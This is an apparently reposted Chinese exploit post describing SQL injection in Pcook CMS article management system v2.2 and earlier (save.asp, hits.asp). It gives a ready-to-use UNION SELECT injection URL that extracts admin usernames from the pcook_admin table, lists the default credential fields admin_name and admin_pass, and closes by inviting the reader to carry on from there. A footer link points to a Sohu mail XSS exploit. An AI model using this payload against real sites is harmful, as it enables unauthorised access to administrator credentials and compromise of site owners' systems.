漏洞标题:Pcook CMS 文章管理系统 v2.2 以及以下版本的注入漏洞
影响程序:Pcook CMS 文章管理系统 v2.2 以及以下版本
下载地址:http://down.chinaz.com/soft/23761.htm
漏洞文件:save.asp,hits.asp
save.asp 代码:
Dim id |
过滤不全,直接可以利用。
随便找篇文章,链接如:list.asp?id=1341,把 list.asp 改为 save.asp 就可以了,如下:
save.asp?id=1341%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin_name,16,17,18,19,20,21%20from%20pcook_admin
有的也许是19个字段,刚刚就有遇到过。
默认表名:pcook_admin
默认字段表:admin_name,admin_pass
然后该干嘛干嘛去……
文章来源于lcx.cc:Pcook CMS v2.2 以及以下版本的注入漏洞
相关推荐: 【Exp】mail sohu xss 搜狐邮箱跨站
mail sohu xss 搜狐邮箱跨站 转自:T00LS - 低调求发展 影响:IE6,IE7,IE8 代码: 截图: 下载 (72.58 KB) 2 小时前 文章来源于lcx.cc:【Exp】mail sohu xss 搜狐邮箱跨站相关推荐: 【价值】我不…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论